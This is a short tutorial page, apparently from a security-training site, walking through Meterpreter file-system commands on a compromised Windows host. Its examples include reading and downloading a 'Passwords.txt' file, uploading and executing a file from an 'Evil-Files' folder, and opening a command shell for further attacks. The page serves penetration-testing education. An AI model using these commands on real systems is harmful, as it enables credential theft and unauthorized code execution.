White Hat Institute

post-exploitation techniques part-2


Meterpreter file system commands (post-exploitation techniques part-2)

When you have a Meterpreter shell, you are dealing with local and remote file systems. File system commands enable you to interact with both. You can use standard Linux commands to get around and use the file system.

To list the current working directory, use the “pwd” command.

Ex(meterpreter > pwd).

Post-exploitation 9

To list all files and directories, use the “ls” command.

Ex(meterpreter > ls).

Post exploitation 10

To change the current directory, use the command “cd” and provide the directory name.

Ex: (meterpreter > cd IEUser).

Post exploitation 11

To read any file, use the “cat” command and specify a file name you want to read.

Ex(meterpreter > cat Passwords.txt).

Post exploitation 12

To download a particular file, use the “download” command and specify a file you want to download.

Ex(meterpreter > download Passwords.txt).

The “Passwords.txt” file will be downloaded to the directory you are currently in.

Post exploitation 13

To upload a file, use the “upload” command and specify a file or a direct path to the file you want to upload.

Ex(meterpreter > upload /var/www/html/Evil-Files/Nissan.jpg).

Post exploitation 14

To execute a file, use the “execute -f” command and specify a file name.

Ex(meterpreter > execute -f Nissan.jpg).

Post exploitation 15

To change the Meterpreter shell to a Windows command shell — use the “shell” command.

Ex: (meterpreter > shell).

Now you can use the default Windows command prompt to perform further investigations or attacks.

Post exploitation 16